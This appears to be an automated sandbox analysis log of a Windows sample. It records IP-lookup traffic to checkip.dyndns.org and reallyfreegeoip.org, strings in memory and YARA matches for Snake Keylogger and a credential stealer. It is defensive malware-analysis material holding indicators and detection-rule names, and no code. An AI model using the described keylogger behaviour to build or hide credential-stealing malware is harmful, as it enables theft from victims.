Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.11:49719 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.11:49726 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: file.exe, 0000000E.00000002.3761812258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002ED5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: file.exe, 0000000E.00000002.3761812258.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: file.exe, 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, rXcourOVPD.exe, 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 0000000F.00000002.1391876242.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 0000000E.00000002.3761812258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: file.exe, 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, rXcourOVPD.exe, 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: file.exe, 0000000E.00000002.3761812258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: file.exe PID: 7544, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: file.exe PID: 7544, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: file.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: file.exe PID: 6176, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: rXcourOVPD.exe PID: 6576, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rXcourOVPD.exe PID: 6576, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_024BDD14	4_2_024BDD14
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04AC76C8	4_2_04AC76C8
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04AC0006	4_2_04AC0006
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04AC0040	4_2_04AC0040
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04AC76B8	4_2_04AC76B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9E190	4_2_04B9E190
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_068403C8	4_2_068403C8
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_06842728	4_2_06842728
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0692A250	4_2_0692A250
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0692A240	4_2_0692A240
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0692C380	4_2_0692C380
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_06929E18	4_2_06929E18
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_06929E09	4_2_06929E09
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0692BA50	4_2_0692BA50
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_069299E0	4_2_069299E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_077A3710	4_2_077A3710
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_077AA6E8	4_2_077AA6E8
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_077A0D46	4_2_077A0D46
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_077A0040	4_2_077A0040
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_077AA6C1	4_2_077AA6C1
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B345E40	4_2_0B345E40
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B34DEB0	4_2_0B34DEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B348CB8	4_2_0B348CB8
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B34EB31	4_2_0B34EB31
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B34DEB0	4_2_0B34DEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B3F0040	4_2_0B3F0040
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B3F7590	4_2_0B3F7590
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B3F0040	4_2_0B3F0040
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFB328	14_2_02BFB328
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFC190	14_2_02BFC190
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BF6108	14_2_02BF6108
